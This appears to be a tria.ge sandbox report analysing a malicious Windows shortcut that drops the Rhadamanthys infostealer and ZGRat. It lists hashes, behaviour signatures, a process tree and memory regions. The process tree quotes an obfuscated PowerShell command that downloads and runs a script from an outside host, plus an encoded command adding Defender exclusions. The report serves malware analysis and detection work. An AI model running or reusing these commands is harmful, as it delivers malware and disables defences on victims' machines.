Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    48s
  • max time network
    42s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    06/05/2024, 13:51

General

  • Target

    51e431b4fa084108a9524d0467a925d518659ac886be3451ffe5ec86da707f4a.lnk

  • Size

    2KB

  • MD5

    17dc01efda95cad71f3de00a136a6672

  • SHA1

    7277a278d3c453adc868f5b27c2e937db3b0bf80

  • SHA256

    51e431b4fa084108a9524d0467a925d518659ac886be3451ffe5ec86da707f4a

  • SHA512

    33daa7f80b2e230ffd83e9211aa818679be9c0450871002ae0dc1892601592140011897173094a9e68bc9b164562f712633b9c56f5e273d636889d6923779f48

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://timecheck.ug/ppx.ps1

Signatures

  • Detect ZGRat V1 34 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Executes dropped EXE 12 IoCs
  • Loads dropped DLL 10 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1196
      • C:\Windows\system32\cmd.exe
        cmd /c C:\Users\Admin\AppData\Local\Temp\51e431b4fa084108a9524d0467a925d518659ac886be3451ffe5ec86da707f4a.lnk
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2220
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Windo 1 $Yh=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal pv $Yh;$MP=((New-Object Net.WebClient)).DownloadString('http://timecheck.ug/ppx.ps1');pv $MP
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2664
          • C:\Users\Public\fhs.exe
            "C:\Users\Public\fhs.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2348
            • C:\Users\Public\fhs.exe
              "C:\Users\Public\fhs.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2440
              • C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe
                "C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe" 0
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2780
                • C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe
                  "C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2360
                  • C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe
                    "C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2668
                • C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe
                  "C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe"
                  7⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:2512
              • C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe
                "C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe" 0
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:7480
                • C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe
                  "C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe"
                  7⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:4324
              • C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe
                "C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe" 0
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                PID:5092
                • C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe
                  "C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe"
                  7⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3976
              • C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe
                "C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe" 0
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                PID:1084
                • C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe
                  "C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe"
                  7⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2260
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3168
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:4600
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:4808
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1940
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {358DFB76-3FB2-4E69-8998-7123B0E3BAD6} S-1-5-21-2721934792-624042501-2768869379-1000:BISMIZHX\Admin:S4U:
      1⤵
        PID:2484
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVABhAGcAcwAuAGUAeABlADsA
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5224

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe

        Filesize

        5.3MB

        MD5

        de08b70c1b36bce2c90a34b9e5e61f09

        SHA1

        1628635f073c61ad744d406a16d46dfac871c9c2

        SHA256

        432747c04ab478a654328867d7ca806b52fedf1572c74712fa8b7c0edb71df67

        SHA512

        18a30e480ce7d122cfad5a99570042e3bef9e1f9feda1f7be32b273a7248274285c65ac997c90d3d6a950a37b4ea62e6b928bfefc924187c90e32ea571bfd1f5

      • C:\Users\Public\fhs.exe

        Filesize

        760KB

        MD5

        8333b78c2a3eacf8cfd843a7b62ce6ba

        SHA1

        81a4d7d00d04da14a6059ed068238a7e2321f721

        SHA256

        aaeaf69dc4dd105e8e2d637a9336af389b7c3d5175421d80fabd5c91be86b665

        SHA512

        c3fb49362632765d2fca9855b3ea004ba3548c8d86f92d4739b28623103b93ee532a03535b43628a1a00cd96198b91f319db9b1aa7891b17d2dedaa8ff919f27

      • \Users\Admin\AppData\Local\Temp\BLHisbnd.exe

        Filesize

        3.4MB

        MD5

        e13e6f7986b9d1eff55fe30133592c40

        SHA1

        8299d50b76990e9dc7e0a8cc67e2f4d44cb810f5

        SHA256

        407e9094206a37707a368f4cd0103269c50b8c0c03edba87b4f20664d259f207

        SHA512

        bb41209d410ff38c01279d119f646658e363a3055a4f152b6a2c76b9cdb1fb42441b243fa8f7fb7a353a1b0e78c619e499274185f40d8592e43551da46bd97a6

      • memory/1084-21974-0x00000000009A0000-0x0000000000EFA000-memory.dmp

        Filesize

        5.4MB

      • memory/2360-4982-0x0000000000230000-0x0000000000590000-memory.dmp

        Filesize

        3.4MB

      • memory/2360-4983-0x0000000004B40000-0x0000000004DF8000-memory.dmp

        Filesize

        2.7MB

      • memory/2360-9864-0x00000000057B0000-0x00000000058A4000-memory.dmp

        Filesize

        976KB

      • memory/2440-58-0x0000000000400000-0x0000000000408000-memory.dmp

        Filesize

        32KB

      • memory/2440-56-0x0000000000400000-0x0000000000408000-memory.dmp

        Filesize

        32KB

      • memory/2664-38-0x000007FEF5F2E000-0x000007FEF5F2F000-memory.dmp

        Filesize

        4KB

      • memory/2664-40-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

        Filesize

        32KB

      • memory/2664-45-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

        Filesize

        9.6MB

      • memory/2664-54-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

        Filesize

        9.6MB

      • memory/2664-41-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

        Filesize

        9.6MB

      • memory/2664-44-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

        Filesize

        9.6MB

      • memory/2664-43-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

        Filesize

        9.6MB

      • memory/2664-42-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

        Filesize

        9.6MB

      • memory/2664-39-0x000000001B640000-0x000000001B922000-memory.dmp

        Filesize

        2.9MB

      • memory/2668-12113-0x0000000000950000-0x0000000000958000-memory.dmp

        Filesize

        32KB

      • memory/2668-12114-0x0000000002200000-0x0000000002256000-memory.dmp

        Filesize

        344KB

      • memory/2668-9884-0x00000000000D0000-0x000000000017C000-memory.dmp

        Filesize

        688KB

      • memory/2668-9885-0x00000000022A0000-0x0000000002388000-memory.dmp

        Filesize

        928KB

      • memory/2780-4956-0x00000000004A0000-0x00000000004EC000-memory.dmp

        Filesize

        304KB

      • memory/2780-81-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-119-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-117-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-115-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-113-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-4955-0x0000000006D00000-0x0000000006FEC000-memory.dmp

        Filesize

        2.9MB

      • memory/2780-123-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-111-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-109-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-105-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-103-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-99-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-97-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-93-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-89-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-87-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-85-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-83-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-121-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-77-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-101-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-95-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-91-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-79-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-75-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-4963-0x0000000000C70000-0x0000000000CC4000-memory.dmp

        Filesize

        336KB

      • memory/2780-125-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-127-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-129-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-131-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-133-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-107-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-74-0x00000000051A0000-0x000000000564B000-memory.dmp

        Filesize

        4.7MB

      • memory/2780-72-0x00000000010F0000-0x000000000164A000-memory.dmp

        Filesize

        5.4MB

      • memory/2780-73-0x00000000051A0000-0x0000000005650000-memory.dmp

        Filesize

        4.7MB

      • memory/5092-17044-0x0000000000CF0000-0x000000000124A000-memory.dmp

        Filesize

        5.4MB

      • memory/5224-21948-0x0000000019FB0000-0x000000001A292000-memory.dmp

        Filesize

        2.9MB

      • memory/5224-21949-0x0000000001370000-0x0000000001378000-memory.dmp

        Filesize

        32KB

      • memory/7480-12123-0x0000000001330000-0x000000000188A000-memory.dmp

        Filesize

        5.4MB